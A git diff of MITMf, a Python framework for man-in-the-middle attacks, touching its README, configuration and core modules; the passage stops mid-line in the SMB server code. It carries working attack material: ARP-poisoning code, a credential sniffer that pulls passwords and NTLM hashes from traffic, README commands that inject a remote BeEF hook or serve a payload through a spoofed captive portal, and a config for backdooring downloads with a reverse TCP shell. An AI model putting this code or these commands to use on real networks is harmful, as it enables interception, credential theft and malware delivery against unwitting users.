diff --git a/.coveragerc b/.coveragerc deleted file mode 100644 index 2a138cb..0000000 --- a/.coveragerc +++ /dev/null @@ -1,8 +0,0 @@ -[run] -branch = True - -[report] -include = *core*, *libs*, *plugins* -exclude_lines = - pragma: nocover - pragma: no cover diff --git a/.gitignore b/.gitignore index acdb2f6..0860090 100644 --- a/.gitignore +++ b/.gitignore @@ -57,7 +57,3 @@ docs/_build/ # PyBuilder target/ - -# OSX Stuff -.DS_Store -._.DS_Store diff --git a/.travis.yml b/.travis.yml index 1656a7a..8d2267b 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,27 +1,11 @@ language: python python: - "2.7" - -addons: - apt: - packages: - - libpcap0.8-dev - - libnetfilter-queue-dev - - libssl-dev - -notifications: - irc: - channels: - - "irc.freenode.org#MITMf" - template: - - "%{repository}#%{build_number} (%{branch} - %{commit} - %{commit_subject} : %{author}): %{message}" - skip_join: true - use_notice: true +sudo: required +before_install: + - "ifconfig" + - "sudo apt-get update -qq" + - "sudo apt-get install tcpdump libpcap0.8-dev libnetfilter-queue-dev libssl-dev" install: "pip install -r requirements.txt" -before_script: - - "pip install python-coveralls" -script: - - "nosetests --with-cov" -after_success: - - coveralls +script: nosetests \ No newline at end of file diff --git a/CONTRIBUTORS.md b/CONTRIBUTORS.md index d0f9f61..117d02f 100644 --- a/CONTRIBUTORS.md +++ b/CONTRIBUTORS.md @@ -1,4 +1,4 @@ -# Intentional contributors (in no particular order) +#Intentional contributors (in no particular order) - @rthijssen - @ivangr0zni (Twitter) @@ -13,7 +13,7 @@ - @auraltension - @HAMIDx9 -# Unintentional contributors and/or projects that I stole code from +#Unintentional contributors and/or projects that I stole code from - Metasploit Framework's os.js and Javascript Keylogger module - Responder by Laurent Gaffie diff --git a/README.md b/README.md old mode 100755 new mode 100644 index 2b60ea0..a52fb9a --- a/README.md +++ b/README.md @@ -3,14 +3,11 @@ ![Supported OS](https://img.shields.io/badge/Supported%20OS-Linux-yellow.svg) [![Code Climate](https://codeclimate.com/github/byt3bl33d3r/MITMf/badges/gpa.svg)](https://codeclimate.com/github/byt3bl33d3r/MITMf) [![Build Status](https://travis-ci.org/byt3bl33d3r/MITMf.svg)](https://travis-ci.org/byt3bl33d3r/MITMf) -[![Coverage Status](https://coveralls.io/repos/byt3bl33d3r/MITMf/badge.svg?branch=master&service=github)](https://coveralls.io/github/byt3bl33d3r/MITMf?branch=master) -# MITMf +#MITMf Framework for Man-In-The-Middle attacks -**This project is no longer being updated. MITMf was written to address the need, at the time, of a modern tool for performing Man-In-The-Middle attacks. Since then many other tools have been created to fill this space, you should probably be using [Bettercap](https://github.com/bettercap/bettercap) as it is far more feature complete and better maintained.** - Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-proxy) and is an attempt to revive and update the project. 
@@ -18,7 +15,7 @@ This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-prox Contact me at: - Twitter: @byt3bl33d3r - IRC on Freenode: #MITMf -- Email: byt3bl33d3r@protonmail.com +- Email: byt3bl33d3r@gmail.com **Before submitting issues, please read the relevant [section](https://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug) in the wiki .** @@ -114,33 +111,13 @@ Inject a JS script: ```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js``` -Start a captive portal that redirects everything to http://SERVER/PATH: - -```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH``` - -Start captive portal at http://your-ip/portal.html using default page /portal.html (thx responder) and /CaptiveClient.exe (not included) from the config/captive folder: - -```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive``` - -Same as above but with hostname captive.portal instead of IP (requires captive.portal to resolve to your IP, e.g. via DNS spoof): - -```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns``` - -Serve a captive portal with an additional SimpleHTTPServer instance serving the LOCALDIR at http://IP:8080 (change port in mitmf.config): - -```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR``` - -Same as above but with hostname: - -```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns``` - And much much more! Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..) For a complete list of available options, just run ```python mitmf.py --help``` -# Currently available plugins +#Currently available plugins - **HTA Drive-By** : Injects a fake update notification and prompts clients to download an HTA application - **SMBTrap** : Exploits the 'SMB Trap' vulnerability on connected clients @@ -150,22 +127,12 @@ For a complete list of available options, just run ```python mitmf.py --help``` - **Spoof** : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing - **BeEFAutorun** : Autoruns BeEF modules based on a client's OS or browser type - **AppCachePoison** : Performs HTML5 App-Cache poisoning attacks -- **Ferret-NG** : Transparently hijacks client sessions +- **Ferret-NG** : Transperently hijacks client sessions - **BrowserProfiler** : Attempts to enumerate all browser plugins of connected clients - **FilePwn** : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy - **Inject** : Inject arbitrary content into HTML content - **BrowserSniper** : Performs drive-by attacks on clients with out-of-date browser plugins - **JSkeylogger** : Injects a Javascript keylogger into a client's webpages -- **Replace** : Replace arbitrary content in HTML content +- **Replace** : Replace arbitary content in HTML content - **SMBAuth** : Evoke SMB challenge-response authentication attempts - **Upsidedownternet** : Flips images 180 degrees -- **Captive** : Creates a captive portal, redirecting HTTP requests using 302 - -# How to fund my tea & sushi reserve - -BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU - -ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee - -LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr - diff --git a/config/captive/portal.html b/config/captive/portal.html deleted file mode 100755 index 80b0cac..0000000 --- a/config/captive/portal.html +++ /dev/null @@ -1,31 +0,0 @@ - - -Captive Portal - - - - -
- Client Required
- - - diff --git a/config/mitmf.conf b/config/mitmf.conf old mode 100755 new mode 100644 index 1e78825..6832dce --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -38,7 +38,6 @@ [[[A]]] # Queries for IPv4 address records *.thesprawl.org=192.168.178.27 - *.captive.portal=192.168.1.100 [[[AAAA]]] # Queries for IPv6 address records *.thesprawl.org=2001:db8::1 @@ -76,19 +75,11 @@ # # Plugin configuration starts here # -[Captive] - - # Set Server Port and string if we are serving our own portal from SimpleHTTPServer (80 is already used by default server) - Port = 8080 - ServerString = "Captive Server 1.0" - - # Set the filename served as /CaptivePortal.exe by integrated http server - PayloadFilename = config/captive/calc.exe [Replace] [[Regex1]] - 'Google Search' = '44CON' + 'Google Search' = 'Google yssas' [[Regex2]] "I'm Feeling Lucky" = "I'm Feeling Something In My Pants" @@ -98,7 +89,7 @@ # Here you can specify the client to hijack sessions from # - Client = '10.0.237.91' + Client = '192.168.1.26' [SSLstrip+] @@ -454,10 +445,10 @@ PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND # PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke PATCH_METHOD = automatic - HOST = 192.168.20.79 + HOST = 192.168.1.16 PORT = 8090 # SHELL for use with automatic PATCH_METHOD - SHELL = iat_reverse_tcp_stager_threaded + SHELL = iat_reverse_tcp_inline_threaded # SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload SUPPLIED_SHELLCODE = None ZERO_CERT = True @@ -512,7 +503,7 @@ LinuxType = None WindowsType = ALL CompressedFiles = False - #inherits WindowsIntelx86 from ALL + #inherits WindowsIntelx32 from ALL [[[[WindowsIntelx86]]]] PATCH_DLL = False ZERO_CERT = True diff --git a/core/banners.py b/core/banners.py index a463ffa..51438c8 100644 --- a/core/banners.py +++ b/core/banners.py @@ -65,18 +65,6 @@ banner4 = """ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝ """ -banner5 = """ -@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@ -@@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@@ @@@@@@@@ -@@! @@! @@! @@! @@! @@! @@! @@! @@! -!@! !@! !@! !@! !@! !@! !@! !@! !@! -@!! !!@ @!@ !!@ @!! @!! !!@ @!@ @!!!:! -!@! ! !@! !!! !!! !@! ! !@! 
!!!!!: -!!: !!: !!: !!: !!: !!: !!: -:!: :!: :!: :!: :!: :!: :!: -::: :: :: :: ::: :: :: - : : : : : : : -""" - def get_banner(): - return random.choice([banner1, banner2, banner3, banner4, banner5]) + banners = [banner1, banner2, banner3, banner4] + return random.choice(banners) diff --git a/core/beefapi.py b/core/beefapi.py index e427619..7a66797 100644 --- a/core/beefapi.py +++ b/core/beefapi.py @@ -342,12 +342,6 @@ class Session(object): logs.append(Log(log)) return logs - def update(self, options={}): - headers = {"Content-Type": "application/json", "charset": "UTF-8"} - payload = json.dumps(options) - r = requests.post("{}/hooks/update/{}?token={}".format(self.url, self.session, self.token), headers=headers, data=payload) - return r.json() - def run(self, module_id, options={}): headers = {"Content-Type": "application/json", "charset": "UTF-8"} payload = json.dumps(options) diff --git a/core/configwatcher.py b/core/configwatcher.py index 95716de..7f7b955 100644 --- a/core/configwatcher.py +++ b/core/configwatcher.py @@ -21,7 +21,7 @@ import pyinotify import threading from configobj import ConfigObj -class ConfigWatcher(pyinotify.ProcessEvent, object): +class ConfigWatcher(pyinotify.ProcessEvent): @property def config(self): diff --git a/core/ferretng/ServerConnection.py b/core/ferretng/ServerConnection.py index f35fe2b..5cd085d 100644 --- a/core/ferretng/ServerConnection.py +++ b/core/ferretng/ServerConnection.py @@ -110,7 +110,7 @@ class ServerConnection(HTTPClient): self.isCompressed = True elif (key.lower()== 'strict-transport-security'): - log.debug("[ServerConnection] Zapped a strict-transport-security header") + log.debug("[ServerConnection] Zapped a strict-trasport-security header") elif (key.lower() == 'content-length'): self.contentLength = value diff --git a/core/mitmfapi.py b/core/mitmfapi.py index 195b8d2..710ae98 100644 --- a/core/mitmfapi.py +++ b/core/mitmfapi.py @@ -75,13 +75,13 @@ class mitmfapi(ConfigWatcher): if status == "1": for p in ProxyPlugins().all_plugins: if (p.name == plugin) and (p not in ProxyPlugins().plugin_list): - ProxyPlugins().add_plugin(p) + ProxyPlugins().addPlugin(p) return json.dumps({"plugin": plugin, "response": "success"}) elif status == "0": for p in ProxyPlugins().plugin_list: if p.name == plugin: - ProxyPlugins().remove_plugin(p) + ProxyPlugins().removePlugin(p) return json.dumps({"plugin": plugin, "response": "success"}) return json.dumps({"plugin": plugin, "response": "failed"}) @@ -97,4 +97,4 @@ class mitmfapi(ConfigWatcher): def start(self): api_thread = threading.Thread(name='mitmfapi', target=self.startFlask) api_thread.setDaemon(True) - api_thread.start() + api_thread.start() \ No newline at end of file diff --git a/core/netcreds.py b/core/netcreds.py index 5518852..5daa6b8 100644 --- a/core/netcreds.py +++ b/core/netcreds.py @@ -41,8 +41,6 @@ NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+' # Prone to false+ but prefer that to false- http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))' -parsing_pcap = False - class NetCreds: version = "1.0" @@ -53,64 +51,15 @@ class NetCreds: except Exception as e: if "Interrupted system call" in e: pass - def start(self, interface, ip): - t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,)) - t.setDaemon(True) - t.start() - - def parse_pcap(self, pcap): - parsing_pcap=True - - for pkt in PcapReader(pcap): - pkt_parser(pkt) - - sys.exit() - -def frag_remover(ack, load): - ''' - Keep the 
FILO OrderedDict of frag loads from getting too large - 3 points of limit: - Number of ip_ports < 50 - Number of acks per ip:port < 25 - Number of chars in load < 5000 - ''' - global pkt_frag_loads - - # Keep the number of IP:port mappings below 50 - # last=False pops the oldest item rather than the latest - while len(pkt_frag_loads) > 50: - pkt_frag_loads.popitem(last=False) - - # Loop through a deep copy dict but modify the original dict - copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) - for ip_port in copy_pkt_frag_loads: - if len(copy_pkt_frag_loads[ip_port]) > 0: - # Keep 25 ack:load's per ip:port - while len(copy_pkt_frag_loads[ip_port]) > 25: - pkt_frag_loads[ip_port].popitem(last=False) - - # Recopy the new dict to prevent KeyErrors for modifying dict in loop - copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) - for ip_port in copy_pkt_frag_loads: - # Keep the load less than 75,000 chars - for ack in copy_pkt_frag_loads[ip_port]: - # If load > 5000 chars, just keep the last 200 chars - if len(copy_pkt_frag_loads[ip_port][ack]) > 5000: - pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:] - -def frag_joiner(ack, src_ip_port, load): - ''' - Keep a store of previous fragments in an OrderedDict named pkt_frag_loads - ''' - for ip_port in pkt_frag_loads: - if src_ip_port == ip_port: - if ack in pkt_frag_loads[src_ip_port]: - # Make pkt_frag_loads[src_ip_port][ack] = full load - old_load = pkt_frag_loads[src_ip_port][ack] - concat_load = old_load + load - return OrderedDict([(ack, concat_load)]) - - return OrderedDict([(ack, load)]) + def start(self, interface, ip, pcap): + if pcap: + for pkt in PcapReader(pcap): + pkt_parser(pkt) + sys.exit() + else: + t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,)) + t.setDaemon(True) + t.start() def pkt_parser(pkt): ''' @@ -178,7 +127,53 @@ def pkt_parser(pkt): telnet_logins(src_ip_port, dst_ip_port, load, ack, seq) # HTTP and other protocols that run on TCP + a raw load - other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, True) + other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt) + +def frag_remover(ack, load): + ''' + Keep the FILO OrderedDict of frag loads from getting too large + 3 points of limit: + Number of ip_ports < 50 + Number of acks per ip:port < 25 + Number of chars in load < 5000 + ''' + global pkt_frag_loads + + # Keep the number of IP:port mappings below 50 + # last=False pops the oldest item rather than the latest + while len(pkt_frag_loads) > 50: + pkt_frag_loads.popitem(last=False) + + # Loop through a deep copy dict but modify the original dict + copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) + for ip_port in copy_pkt_frag_loads: + if len(copy_pkt_frag_loads[ip_port]) > 0: + # Keep 25 ack:load's per ip:port + while len(copy_pkt_frag_loads[ip_port]) > 25: + pkt_frag_loads[ip_port].popitem(last=False) + + # Recopy the new dict to prevent KeyErrors for modifying dict in loop + copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads) + for ip_port in copy_pkt_frag_loads: + # Keep the load less than 75,000 chars + for ack in copy_pkt_frag_loads[ip_port]: + # If load > 5000 chars, just keep the last 200 chars + if len(copy_pkt_frag_loads[ip_port][ack]) > 5000: + pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:] + +def frag_joiner(ack, src_ip_port, load): + ''' + Keep a store of previous fragments in an OrderedDict named pkt_frag_loads + ''' + for ip_port in pkt_frag_loads: + if src_ip_port == ip_port: + if ack in 
pkt_frag_loads[src_ip_port]: + # Make pkt_frag_loads[src_ip_port][ack] = full load + old_load = pkt_frag_loads[src_ip_port][ack] + concat_load = old_load + load + return OrderedDict([(ack, concat_load)]) + + return OrderedDict([(ack, load)]) def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq): ''' @@ -535,14 +530,14 @@ def irc_logins(full_load, pkt): msg = 'IRC pass: %s' % pass_search2.group(1) return msg -def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose): +def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt): ''' Pull out pertinent info from the parsed HTTP packet data ''' user_passwd = None http_url_req = None method = None - http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD '] + http_methods = ['GET ', 'POST', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD '] http_line, header_lines, body = parse_http_load(full_load, http_methods) headers = headers_to_dict(header_lines) if 'host' in headers: @@ -550,51 +545,44 @@ def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose): else: host = '' - if parsing_pcap is True: + #if http_line != None: + # method, path = parse_http_line(http_line, http_methods) + # http_url_req = get_http_url(method, host, path, headers) + #if http_url_req != None: + #printer(src_ip_port, None, http_url_req) - if http_line != None: - method, path = parse_http_line(http_line, http_methods) - http_url_req = get_http_url(method, host, path, headers) - if http_url_req != None: - if verbose == False: - if len(http_url_req) > 98: - http_url_req = http_url_req[:99] + '...' - printer(src_ip_port, None, http_url_req) + # Print search terms + searched = get_http_searches(http_url_req, body, host) + if searched: + printer(src_ip_port, dst_ip_port, searched) - # Print search terms - searched = get_http_searches(http_url_req, body, host) - if searched: - printer(src_ip_port, dst_ip_port, searched) + #We dont need this cause its being taking care of by the proxy + + #Print user/pwds + #if body != '': + # user_passwd = get_login_pass(body) + # if user_passwd != None: + # try: + # http_user = user_passwd[0].decode('utf8') + # http_pass = user_passwd[1].decode('utf8') + # # Set a limit on how long they can be prevent false+ + # if len(http_user) > 75 or len(http_pass) > 75: + # return + # user_msg = 'HTTP username: %s' % http_user + # printer(src_ip_port, dst_ip_port, user_msg) + # pass_msg = 'HTTP password: %s' % http_pass + # printer(src_ip_port, dst_ip_port, pass_msg) + # except UnicodeDecodeError: + # pass - # Print user/pwds - if body != '': - user_passwd = get_login_pass(body) - if user_passwd != None: - try: - http_user = user_passwd[0].decode('utf8') - http_pass = user_passwd[1].decode('utf8') - # Set a limit on how long they can be prevent false+ - if len(http_user) > 75 or len(http_pass) > 75: - return - user_msg = 'HTTP username: %s' % http_user - printer(src_ip_port, dst_ip_port, user_msg) - pass_msg = 'HTTP password: %s' % http_pass - printer(src_ip_port, dst_ip_port, pass_msg) - except UnicodeDecodeError: - pass - - # Print POST loads - # ocsp is a common SSL post load that's never interesting - if method == 'POST' and 'ocsp.' not in host: - try: - if verbose == False and len(body) > 99: - # If it can't decode to utf8 we're probably not interested in it - msg = 'POST load: %s...' 
% body[:99].encode('utf8') - else: - msg = 'POST load: %s' % body.encode('utf8') - printer(src_ip_port, None, msg) - except UnicodeDecodeError: - pass + # Print POST loads + # ocsp is a common SSL post load that's never interesting + #if method == 'POST' and 'ocsp.' not in host: + # try: + # msg = 'POST load: %s' % body.encode('utf8') + # printer(src_ip_port, None, msg) + # except UnicodeDecodeError: + # pass # Kerberos over TCP decoded = Decode_Ip_Packet(str(pkt)[14:]) @@ -674,10 +662,7 @@ def parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header): b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE) if b64_auth_re != None: basic_auth_b64 = b64_auth_re.group(1) - try: - basic_auth_creds = base64.decodestring(basic_auth_b64) - except Exception: - return + basic_auth_creds = base64.decodestring(basic_auth_b64) msg = 'Basic Authentication: %s' % basic_auth_creds printer(src_ip_port, dst_ip_port, msg) @@ -728,13 +713,15 @@ def headers_to_dict(header_lines): Convert the list of header lines into a dictionary ''' headers = {} - for line in header_lines: - lineList=line.split(': ', 1) - key=lineList[0].lower() - if len(lineList)>1: - headers[key]=lineList[1] - else: - headers[key]="" + # Incomprehensible list comprehension flattens list of headers + # that are each split at ': ' + # http://stackoverflow.com/a/406296 + headers_list = [x for line in header_lines for x in line.split(': ', 1)] + headers_dict = dict(zip(headers_list[0::2], headers_list[1::2])) + # Make the header key (like "Content-Length") lowercase + for header in headers_dict: + headers[header.lower()] = headers_dict[header] + return headers def parse_http_line(http_line, http_methods): @@ -807,12 +794,9 @@ def parse_netntlm_chal(headers, chal_header, ack): header_val2 = header_val2.split(' ', 1) # The header value can either start with NTLM or Negotiate if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate': - try: - msg2 = header_val2[1] - except IndexError: - return + msg2 = header_val2[1] msg2 = base64.decodestring(msg2) - parse_ntlm_chal(msg2, ack) + parse_ntlm_chal(ack, msg2) def parse_ntlm_chal(msg2, ack): ''' @@ -901,10 +885,10 @@ def get_login_pass(body): 'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname', 'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename', 'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username', - 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario'] + 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in'] passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword', 'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password' - 'passwort', 'passwrd', 'wppassword', 'upasswd','senha','contrasena'] + 'passwort', 'passwrd', 'wppassword', 'upasswd'] for login in userfields: login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE) diff --git a/core/packetfilter.py b/core/packetfilter.py index cd4ad09..e8f0d5d 100644 --- a/core/packetfilter.py +++ b/core/packetfilter.py @@ -1,3 +1,5 @@ +import threading + from core.utils import set_ip_forwarding, iptables from core.logger import logger from scapy.all import * @@ -17,21 +19,22 @@ class PacketFilter: iptables().NFQUEUE() self.nfqueue = NetfilterQueue() - self.nfqueue.bind(0, self.modify) + self.nfqueue.bind(1, self.modify) - self.nfqueue.run() + t = 
threading.Thread(name='packetparser', target=self.nfqueue.run) + t.setDaemon(True) + t.start() def modify(self, pkt): #log.debug("Got packet") data = pkt.get_payload() packet = IP(data) - for filter in self.filter: - try: - execfile(filter) - except Exception: - log.debug("Error occurred in filter", filter) - print_exc() + try: + execfile(self.filter) + except Exception: + log.debug("Error occurred in filter") + print_exc() pkt.set_payload(str(packet)) #set the packet content to our modified version pkt.accept() #accept the packet @@ -39,4 +42,4 @@ class PacketFilter: def stop(self): self.nfqueue.unbind() set_ip_forwarding(0) - iptables().flush() + iptables().flush() \ No newline at end of file diff --git a/core/poisoners/ARP.py b/core/poisoners/ARP.py index a70af0f..24e0b0f 100644 --- a/core/poisoners/ARP.py +++ b/core/poisoners/ARP.py @@ -214,8 +214,8 @@ class ARPpoisoner: if targetmac is not None: try: #log.debug("Poisoning {} <-> {}".format(targetip, self.gatewayip)) - self.s2.send(Ether(src=self.mymac, dst=targetmac)/ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op=arpmode)) - self.s2.send(Ether(src=self.mymac, dst=self.gatewaymac)/ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op=arpmode)) + self.s.send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op=arpmode)) + self.s.send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op=arpmode)) except Exception as e: if "Interrupted system call" not in e: log.error("Exception occurred while poisoning {}: {}".format(targetip, e)) @@ -242,8 +242,8 @@ class ARPpoisoner: log.info("Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count)) try: for i in range(0, count): - self.s2.send(Ether(src=targetmac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac)) - self.s2.send(Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac)) + self.s.send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac)) + self.s.send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac)) except Exception as e: if "Interrupted system call" not in e: log.error("Exception occurred while poisoning {}: {}".format(targetip, e)) diff --git a/core/poisoners/DHCP.py b/core/poisoners/DHCP.py index b46cf54..cd6ff20 100644 --- a/core/poisoners/DHCP.py +++ b/core/poisoners/DHCP.py @@ -79,7 +79,7 @@ class DHCPpoisoner(): return 'stored', client_ip net = IPNetwork(self.ip_address + '/24') - return 'generated', str(random.choice(list(net))) + return 'generated', random.choice(list(net)) def dhcp_callback(self, resp): if resp.haslayer(DHCP): diff --git a/core/proxyplugins.py b/core/proxyplugins.py index ff4390e..efb1833 100644 --- a/core/proxyplugins.py +++ b/core/proxyplugins.py @@ -82,10 +82,7 @@ class ProxyPlugins: self.plugin_list.remove(p) log.debug("Removing {} plugin".format(p.name)) for mthd,pmthd in self.mthdDict.iteritems(): - try: - self.plugin_mthds[mthd].remove(getattr(p,pmthd)) - except KeyError: - pass #nothing to remove + self.plugin_mthds[mthd].remove(p) def hook(self): '''Magic to hook various function calls in sslstrip''' @@ -111,10 +108,9 @@ class ProxyPlugins: log.debug("hooking {}()".format(fname)) #calls any plugin that has this hook try: - if self.plugin_mthds: - for f in self.plugin_mthds[fname]: - a = f(**args) - if a != 
None: args = a + for f in self.plugin_mthds[fname]: + a = f(**args) + if a != None: args = a except Exception as e: #This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating) log.error("Exception occurred in hooked function") diff --git a/core/servers/DNS.py b/core/servers/DNS.py index 0599e7b..54f1889 100755 --- a/core/servers/DNS.py +++ b/core/servers/DNS.py @@ -48,12 +48,6 @@ from IPy import IP formatter = logging.Formatter("%(asctime)s %(clientip)s [DNS] %(message)s", datefmt="%Y-%m-%d %H:%M:%S") log = logger().setup_logger("DNSChef", formatter) -dnslog = logging.getLogger('dnslog') -handler = logging.FileHandler('./logs/dns/dns.log',) -handler.setFormatter(formatter) -dnslog.addHandler(handler) -dnslog.setLevel(logging.INFO) - # DNSHandler Mixin. The class contains generic functions to parse DNS requests and # calculate an appropriate response based on user parameters. class DNSHandler(): @@ -75,7 +69,6 @@ class DNSHandler(): except Exception as e: log.info("Error: invalid DNS request", extra=clientip) - dnslog.info("Error: invalid DNS request", extra=clientip) else: # Only Process DNS Queries @@ -120,7 +113,6 @@ class DNSHandler(): response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q) log.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip) - dnslog.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip) # IPv6 needs additional work before inclusion: if qtype == "AAAA": @@ -190,7 +182,6 @@ class DNSHandler(): elif qtype == "*" and not None in fake_records.values(): log.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip) - dnslog.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip) response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q) @@ -266,7 +257,6 @@ class DNSHandler(): # Proxy the request else: log.debug("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip) - dnslog.info("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip) nameserver_tuple = random.choice(nameservers).split('#') response = self.proxyrequest(data, *nameserver_tuple) @@ -349,7 +339,6 @@ class DNSHandler(): except Exception as e: log.warning("Could not proxy request: {}".format(e), extra=clientip) - dnslog.info("Could not proxy request: {}".format(e), extra=clientip) else: return reply @@ -357,7 +346,6 @@ class DNSHandler(): clientip = {'clientip': self.client_address[0]} log.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip) - dnslog.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip) response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q) @@ -366,8 +354,7 @@ class DNSHandler(): #First proxy the request with the real domain q = DNSRecord.question(real_domain).pack() r = self.proxyrequest(q, *nameserver_tuple) - if r is None: return None - + #Parse the answer dns_rr = DNSRecord.parse(r).rr @@ -462,12 +449,7 @@ class DNSChef(ConfigWatcher): # Use alternative DNS servers if config['nameservers']: - self.nameservers = [] - - if type(config['nameservers']) is str: - self.nameservers.append(config['nameservers']) - elif type(config['nameservers']) is list: - 
self.nameservers = config['nameservers'] + self.nameservers = config['nameservers'].split(',') for section in config.sections: diff --git a/core/servers/HTTP.py b/core/servers/HTTP.py index 75d0c1d..82296eb 100644 --- a/core/servers/HTTP.py +++ b/core/servers/HTTP.py @@ -49,10 +49,10 @@ class HTTP: def start(self): try: - #if OsInterfaceIsSupported(): - #server = ThreadingTCPServer((settings.Config.Bind_To, 80), HTTP1) - #else: - server = ThreadingTCPServer(('0.0.0.0', 80), HTTP1) + if OsInterfaceIsSupported(): + server = ThreadingTCPServer((settings.Config.Bind_To, 80), HTTP1) + else: + server = ThreadingTCPServer(('', 80), HTTP1) t = threading.Thread(name='HTTP', target=server.serve_forever) t.setDaemon(True) @@ -267,7 +267,7 @@ def PacketSequence(data, client): else: Response = IIS_Auth_401_Ans() if settings.Config.Verbose: - log.info("{} [HTTP] Sending NTLM authentication request".format(client)) + log.info("{} [HTTP] Sending NTLM authentication request to".format(client)) return str(Response) diff --git a/core/servers/SMB.py b/core/servers/SMB.py index cac8027..198ba4d 100644 --- a/core/servers/SMB.py +++ b/core/servers/SMB.py @@ -28,12 +28,12 @@ class SMB: def start(self): try: - #if OsInterfaceIsSupported(): - # server1 = ThreadingTCPServer((settings.Config.Bind_To, 445), SMB1) - # server2 = ThreadingTCPServer((settings.Config.Bind_To, 139), SMB1) - #else: - server1 = ThreadingTCPServer(('0.0.0.0', 445), SMB1) - server2 = ThreadingTCPServer(('0.0.0.0', 139), SMB1) + if OsInterfaceIsSupported(): + server1 = ThreadingTCPServer((settings.Config.Bind_To, 